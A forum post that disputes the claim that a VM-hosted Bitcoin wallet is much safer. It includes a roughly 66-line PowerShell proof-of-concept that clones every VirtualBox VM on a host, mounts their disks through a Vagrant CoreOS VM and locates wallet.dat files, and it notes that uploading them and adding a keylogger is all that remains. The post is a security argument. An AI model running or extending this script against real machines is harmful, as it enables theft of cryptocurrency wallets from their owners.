It is a lot safer than an online machine, but significantly less safe than a true offline machine. I use it myself for a small day-to-day wallet, and have a larger one on an offline machine. The VM is very convenient. Of course a determined hacker who is controlling the online machine can run with the funds. But the random wallet-stealing and password sniffing piece of malware cannot. It requires a specialised piece of malware written for the specific setup.
So this kinda rubbed me the wrong way. I mean nothing personal when I say this, but calling a VM "a
lot safer" is IMO a really dangerous statement. Even if it's true that today's malware doesn't try to reach inside VMs to extract sensitive info (and I'm not so sure about that), trying to guess about how sophisticated malware is a year or two down the road is awfully difficult.
To prove a point over just how "specialised [a] piece of malware written for the specific setup" needs to be, here's a (PowerShell) script which *almost* grabs all wallet.dat files from any (unencrypted) VirtualBox VMs on a Windows host (whether they are currently running or not). It's got plenty of limitations (it requires that Vagrant and Git for Windows are already installed, it has zero error-checking, etc.), but it's just a proof of concept which hopefully gets the point across.
# Add VBoxManage and Git for Windows ssh to the path
$env:Path += ';' + (Join-Path $env:ProgramFiles Oracle\VirtualBox)
$env:Path += ';' + (Join-Path ${env:ProgramFiles(x86)} Git\bin)
# Retrieve the UUIDs of all current VirtualBox VMs
$vm_uuids = VBoxManage list vms | Select-String '{(.*)}$' | ForEach-Object {
$_.Matches[0].Groups[1].Value
}
# Configure Vagrant to prepare a CoreOS VM (relatively small, ~200MB)
mkdir coreos
cd coreos
vagrant init yungsang/coreos
# Modify the CoreOS VM to use a 30-port SATA controller
Add-Content Vagrantfile @"
Vagrant.configure(2) do |config|
config.vm.provider 'virtualbox' do |vb|
vb.customize ['storagectl', :id, '--name', 'SATA Controller', '--portcount', 30]
end
end
"@
# Download and start the CoreOS VM
vagrant up
$coreos_uuid = Get-Content .vagrant\machines\default\virtualbox\id -Head 1
$next_port = 1 # the next available SATA port
foreach ($uuid in $vm_uuids) { # for each VM
# Create a (copy-on-write) clone of the VM (works even if it's currently running)
VBoxManage snapshot $uuid take $uuid-snap --live
VBoxManage clonevm $uuid --snapshot $uuid-snap --options link --name $uuid-clone --register
# Add all of the clone's SATA drives to the CoreOS instance
VBoxManage showvminfo $uuid-clone | Select-String '^SATA .*\(UUID: ([^)]*)' | ForEach-Object {
VBoxManage storageattach $coreos_uuid --storagectl 'SATA Controller' --port ($next_port++) --type hdd --medium $_.Matches[0].Groups[1].Value
}
}
Start-Sleep -Seconds 10 # give CoreOS some time to finish recognizing the new drives
# Try to mount every partition found
vagrant ssh -c 'cd /dev ; for D in sd[b-z]?* ; do mkdir /media/$D ; sudo mount -r $D /media/$D ; done'
# Record all found wallet.dat files
vagrant ssh -c 'sudo find /media -name wallet.dat -ls' > ..\wallet-files.txt
# Remove the CoreOS VM and the Vagrant cached image and config
vagrant destroy -f
vagrant box remove yungsang/coreos -f # comment this out if you intend to run this multiple times to avoid the download step
rmdir -Force -Recurse .vagrant
rm Vagrantfile
cd ..
rmdir coreos
# Remove the VM clones
foreach ($uuid in $vm_uuids) {
VBoxManage unregistervm $uuid-clone --delete
VBoxManage snapshot $uuid delete $uuid-snap
}
Get-Content wallet-files.txt
Write-Host -NoNewline Press any key to exit ...
$host.UI.RawUI.ReadKey('NoEcho,IncludeKeyDown') > $null
So in just 66 lines of Windows shell code, it lists out all found wallet.dat files -- just one step away from actually uploading them somewhere. This plus a keylogger on the host, and it's game over.
Now I'm not even a software dev by trade (or at least haven't been one in a while), so I have to assume that proficient malware authors are going to be a lot more sophisticated about this sort of attack.
I don't mean to claim that there's zero advantage to using VMs (more so when their encryption requires an interactive password), but advocating them as a lot safer (or as
any kind of alternative to cold storage) sounds really troubling to me.
(and you have no choice except simply believing them)
